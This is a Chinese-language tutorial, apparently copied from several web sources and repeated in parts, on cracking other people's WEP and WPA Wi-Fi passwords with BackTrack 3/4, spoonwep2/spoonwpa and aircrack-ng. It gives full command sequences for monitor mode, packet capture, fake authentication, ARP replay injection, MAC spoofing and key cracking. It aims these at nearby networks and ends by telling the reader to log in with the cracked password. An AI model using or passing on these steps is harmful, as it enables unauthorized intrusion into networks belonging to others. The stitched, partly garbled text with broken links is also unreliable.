bt4无线网络破解教程

1、bt4破解教程一、準備篇 1、一個有可破解無線信號的環境。如我在家隨便搜索出來的信號。2、帶無線網卡的電腦一台（筆記本臺式機均可，只要無線網卡相容BT3），我用 的是三星NC10的上網本。3、2G以上優盤一個（我用的是kingston 8G 的）4、搜索 下載BT3，約800兆。或BT4，約900兆。BT3下載地址： http:/f1.soft-BT4 下載地址： http:/ftp.belnet.be/mirror/backtrack/bt4-beta.iso注：BT3 全稱BackTrack3，與我們常說的bt下載是完全不同的概念。以我理解就是集成了一些電腦安全軟體的linux系統。正是由

2、於它的出世和不斷普 及，使得破解可讓普通用戶輕易言之。5、搜索下載spoonwep2中文包。地址： :8080/servlet/FileDownload?filename=/yinghu/上 傳分享/2008/11/13/中文包_spoonwep2.rar&vid=0注：spoonwep2就是我們的破 解軟體，一個非常強悍的圖形化破解WEP無線網路密碼的工具。二、安裝篇1、將優盤格式化，配置如下圖，唯一要注意檔系統選為FAT32就可以了。2、將剛才下載完成的bt3解壓縮，複製到優盤，完成後會看到優盤目錄下有兩個檔夾，一個boot 一個BT3。如下圖：3、開始安裝bt3系統。點擊開始-運

3、行，輸入 CMD, 然後回車，進入命令行模式 。首先輸入你優盤的盤符，我這裏是h盤，輸入h： 然後回車，接下來輸入 cd boot 回車，進入到boot檔夾下，最後 bootinst.bat 回車，就會開始安裝BT3，如下圖：然後安裝會出現一個提示畫面，我們別去管它，直接按任意鍵繼續按任意鍵後，電腦會自動設置引導記錄，整個過程大概10秒左右。出現下面畫面 後，此優盤就可以引導系統進去bt3了。4、集成 spoonwep2軟體。首先把我們先前下載的spoonwep2解壓縮，裏面是六個副檔名為lzm的檔，將這六個檔複製 到優盤bt3modules檔夾下，如圖：這樣我們的 bt3系統已經集成安裝完畢

4、了，可以動手破解了。三 破解篇1、將安裝好系統的優盤插入電腦，重啟後進入bios，設置優盤為電腦第一啟動順序。（這個如果沒設置過，可以問一下其他人，或者在網上找找設置方法，每 台電腦進入bios的方法也不同，如開機按F2，Del，F1等等）2、設置優盤啟動後，電腦會自動帶入我們進入bt3操作系 統（如果出現介面選擇，你要選擇vesa mode），系統介面是這樣的（漂亮吧）：開始輸入指令        ifconfig -a 查看網卡（之後只出現eth0和lo則表示你的無線網卡沒有被識別，要是有eth0、wlan、lo等則表示可以）&#

5、160;       如果出現wlan網卡（本機無線網卡），則進行    ifconfig -a wlan0 up（此命令用於載入網卡，有的時候直接執行spoonwep是不可以的，需要載入）    然後執行ln -fs bash/bin/sh        再執行 ls -all /bin/sh（顯示bash為成功，顯示dash為失敗）現在開始破解1.在shell視窗中輸入 ifconfig 命令 ，出現如下資訊：lo no

6、wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID:"" Nickname:""Mode:（.）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quali

7、ty=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:02.找出你的無線網卡名字，我這裏是 eth1.再啟動你的網卡為Moniter模式(輸入airmon-ng start eth1 11)。再輸入 ifconfig 命令 ，返回如下資訊：lo no wireless extensions.eth0 no wireless extensions

8、.eth1 IEEE 802.11g ESSID:"" Nickname:""Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-

9、95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:03. 輸入命令 airodump-ng -c 11 -bssid 00:1A:01:8D:C3:B2 -w outputs eth1.命令中的11 表示要破解的頻道號，bssid後面的數位表示破解目標的MAC物理位址，outputs表示要生成的包的名稱。回車運行。4.再開一個 shell 輸入 aireplay-ng -1 0 -e targetnet -a 00:1A:

10、01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1其中“targetnet”表示破解目標網路名,00:1A:01:8D:C3:B2前面已解釋過是指目標MAC物理位址，00:A1:C1:D8:A5:B6表示本機網卡MAC物理位址5.再開一個 shell 輸入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1獲取更多的資料包。6.返回資料量到1萬的時候就可以破解了。再開一個shell輸入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 進行破解。如果破解

11、不成功，讓它繼續抓包，直到破解。3、啟動spoonwep2軟體開啟一個命令視窗，輸入：spoonwep 回車後10秒鐘左右彈出spoonwep2程式：NET CARD 網卡介面 選擇 WLAN0DRIVER 驅動 選擇 NORMALMODE 模式 選擇 UNKNOWN VICTIM點 NEXT 轉到 VICTIMS DISCOVERY 窗口CHAN HOPPING 是全頻段掃描 （建議選擇： FIXED CHAN，有針對性的掃描）點擊右上角 LAUNCH 按鈕 (點完後會變成 ABORT ) 這時會彈出抓包視窗，可作為參考，也可不用理會。20秒首先點擊左上角下拉功能表選擇CHAN HOPPIN

12、GLAUNCH(點完後會變成ABORT )會開始自動執行注：ESSID 路由廣播名稱MAC 路由的地址CHAN 使用的頻道POW 信號強度DATA 數據包CLIS 空白代表無用戶端，打鉤則代表有用戶端；（備註：無線網卡搜索一陣子，被搜索到的無線信號的SSID將會列表顯示。如果某加密無線信號的CLIS方框內有“勾”，表示該無線信號此刻托有用戶端，這時破解會高效、快速一些。如果你選中了這樣的的信號，緊接著視窗的下方會顯示出用戶端代表，你應該把下方的用戶端也選中1想參與破解。不要迷信一定要帶用戶端才能破解，沒有用戶端的AP也可以破解，裏路上POW值大於18的都可以破解的。）有用戶端模式比無用戶端模式

13、成功率要高，選中打算破解的路由，下面會顯示出當前所有鏈結到這個路由的用戶端，選擇一個POWER PACKETS都比較高的用戶端。然後點 SELECTION OK 轉到 ATTACK PANEL 視窗第一個下拉功能表有4個選項，後面3個都可作為無用戶端攻擊模式，其中 ：ARP REPLAY ATTACK （有用戶端時用）P0841 REPLAY ATTACK (次次選）CHOPCHOP & FORGEATTACK （次選）FRAGMENTATION & FORGE ATTACK （首選）第二個下拉功能表有3個選項，其中：? LENGTH (不指定加密位數，首選）128 BITS

14、LENGTH （指定128位加密，次次選）64 BITS LENGTH （指定64位加密，次選）兩個下拉功能表右邊的 Inj Rate 是每秒發包數量，選默認的600即可。選擇好兩個下拉功能表，點擊左邊 LAUNCH 按鈕 開始自動破解，破解速度和信號強度成正比。最下面的WEP KEY就是破解出來的密碼，無需輸入冒號。注：有用戶端模式比無用戶端成功率要高。注：破解WPA加密時，輸入命令為spoonwpa，其他操作步驟不變（但一定需要有用戶端連接才能破解）BT4破解教程一、spoonwep- wpa破解工具用於BT4下的deb安裝包迅雷下載地址：(已經修正下載地址， 打開迅雷， 然後複製以下位址

15、即 可)thunder:/QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa二、 運行unetbootin製作BT4的U盤啟動系統。點確定就開始製作了。在這裏需要泡杯茶點支煙等一下。從ISO檔 裏提取檔拷貝到U盤裏需要一段時間。完成之後，不要重啟， 再把剛剛下到的“spoonwep-wpa破解工具用於BT4下的deb安裝包”手動拷貝到U盤根目錄下面， 自己記好它好的名字， 方便到BT4下找到它。三、啟動BT4在BIOS裏面設置從U盤啟動， 這個無法截圖， 自己摸索吧。呵呵四、 進入BT4登陸的用戶名：

16、root，密碼：toorstartx命令啟動圖形化介面。五、安裝 spoonwep-wpa-rc3.deb包點擊左下角的開始功能表，點擊一個叫system mune的彈出功能表，再點擊“storeage media”，會打開一個視窗，點擊視窗上面有個刷新的按鈕，在視窗下面空白的地方會列出你的硬碟和外設，進入U盤，找到剛才放入的spoonwep- wpa-rc3.deb，把這個檔複製到BT4的桌面（其實就是/root），可以直接拖到桌面，打開命令行視窗運行“dpkg -i spoonwep-wpa-rc3.deb” 稍等幾秒中，桌面上出現desktop的檔夾，裏面就有了 spoonwep2+sp

17、oonwpa，好了，大功告成，直接單擊圖示就能運行spoonwep2或spoonwpa了。也可以輸入以下 命令執行:spoonwep2 執行:spoonwep2spoonwpa 執行:spoonwpa六、 開始破解！1、打開一個SHELL，     輸入ifconfig -a2、可以輸入macchange -m 00:11:22:33:44:55 wlan0 來改變本機的MAC位址，3、輸入airmon-ng start wlan0 64、輸入aireplay-ng   -9 mon05、載入網卡輸入ifconfig -a wlan0

18、 up6、輸入ln -fs bash/bin/sh7、輸入ls -al /bin/sh(這個命令可以顯示是否設置成功，顯示bash為成功， dash為失敗)【spoonwep2 破解法】輸入spoonwep2回車後就會彈出spoonwep2的窗口。點擊SPOONWEP SETTINGS,在NET CARD裏選WLAN0，在DRIVER裏選NORMAL,在MODE裏選UNKNOWN VICTIM,再點擊NEXT、點擊LAUNCH進入搜索，然後關閉spoonwep2再開一下，點擊SPOONWEP SETTINGS,在NET CARD裏選MON0，在DRIVER裏選NORMAL,在MODE裏選UNK

19、NOWN VICTIM,再點擊NEXT、點擊LAUNCH進入搜索後就可以看見好多網卡啦，選定1個網卡點擊SELECTION OK,選定PO841 REPLAY ATTACK(這裏有4條命令選擇)，點擊LAUNCH後就等待密碼的出來(sata資料包到30000個左右)。【spoonwpa 破解法】輸入spoonwpa回車後就會彈出spoonwpa的視窗。在NET CARD裏選WLAN0，在DRIVER裏選NORMAL,在MODE裏選UNKNOWN VICTIM,再點擊NEXT、點擊LAUNCH進入搜索，然後關閉spoonwpa再開一下，點擊SPOONWEP SETTINGS,在NET CARD裏

20、選MON0，在DRIVER裏選NORMAL,在MODE裏選UNKNOWN VICTIM,再點擊NEXT、點擊LAUNCH進入搜索後就可以看見好多網卡啦，選定1個必須有用戶端的網卡點擊SELECTION OK, 再點擊LAUNCH AUTOMATED HANDSHAKE CAPTURE，如抓到握手包，請點擊金色鎖開始破解，這完全靠運氣了。七、 用你破解出來的密碼去登陸吧從硬碟啟動BT3和BT4破解教程BT4中文版(集成spoonwep2/spoonwpa)下載地址全功能版本的BT3(dvd版 集成各種驅動 spoonwepBackTrack4 (BT4)最終版 (2010年1月11日版3 完成以

21、上的步驟後就開始破解啦啟動建好的虛擬機，載入BT3,注意如果找不到卡王的話，就“虛擬機-可移動設備-USB設備-Realtak可移動設備”接著就是正式破解了，打開一個shell輸入命令有2種(2選一)(1) Airodump-ng w 1 wlan0(2)airodump-ng -ivs -w 123 -c 6 wlan0回車，開始抓包,出現下圖這樣的是抓包成功小強解釋抓包的資料:a.BSSID 下麵所對應的是你要攻擊破解的路由AP的MAC地址。（要拿筆紙抄下）b.PWR 值 PWR值代表信號強度。值越高越好。一般高於30就可以很容易的破解。此處優先選擇值高者破解c.DATA 數據包。 下面所

22、對應的AP（路由）如果有數值（不為0）就說明有用戶端。有用戶端者優先破解。為0者先放棄。當然如果在破解時，此值為0.也可以破解。只是時間會長點。且成功率降低。d.ESSID 此務必記住 ，此為AP（路由的名字）e.以上請一一對應記好f.請務必選擇 cipher下為wep的破解。如是wap或非wep者則放棄非wep者目前仍未有好的方法破解。很明顯，你要破的是哪一個吧？用第一個來做示範!00：14：78：8B：F3:44打開第二個shell,輸入命令 spoonwep回車後會自動出現一個新視窗在第一行中輸入你選擇的那個BSSID(剛剛小強叫抄的哦)NET CARD 選擇WLANOInj rate

23、可以移動到1000LAUNCH 選擇PO841這個接著點擊LAUNCH，就等著密碼出來吧這個比較快，大概就三分鐘的樣子 WEP KEY:6471686474(密碼就是紅色那個去掉2個數字之間的冒號)最佳答案一、既然有系統了，1.一個U盤啟動製作工具就行：unetbootin-windows-356下載地址：2.spoonwep-wpa破解工具用於BT4下的deb安裝包迅雷下載地址：(已經修正下載地址， 打開迅雷， 然後複製以下位址即可)thunder:/QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlp

24、a二、運行unetbootin製作BT4的U盤啟動系統。點確定就開始製作了。在這裏需要泡杯茶點支煙等一下。從ISO檔裏提取檔拷貝到U盤裏需要一段時間。完成之後，不要重啟， 再把剛剛下到的“spoonwep-wpa破解工具用於BT4下的deb安裝包”手動拷貝到U盤根目錄下面， 自己記好它好的名字， 方便到BT4下找到它。三、啟動BT4在BIOS裏面設置從U盤啟動， 這個無法截圖， 自己摸索吧。呵呵四、進入BT4登陸的用戶名：root，密碼：toorstartx命令啟動圖形化介面。五、安裝spoonwep-wpa-rc3.deb包點擊左下角的開始功能表，點擊一個叫system mune的彈出功能表，再點擊“storeage media”，會打開一個視窗，點擊視窗上面有個刷新的按鈕，在視窗下面空白的地方會列出你的硬碟和外設，進入U盤，找到剛才放入的spoonwep-wpa-rc3.deb，把這個檔複製到BT4的桌面（其實就是/root），可以直接拖到桌面，打開命令行視窗運行“dpkg -i spoonwep-wpa-rc3.deb” 稍等幾秒中，桌面上出現desktop的檔夾，裏面就有了spoonwep2+s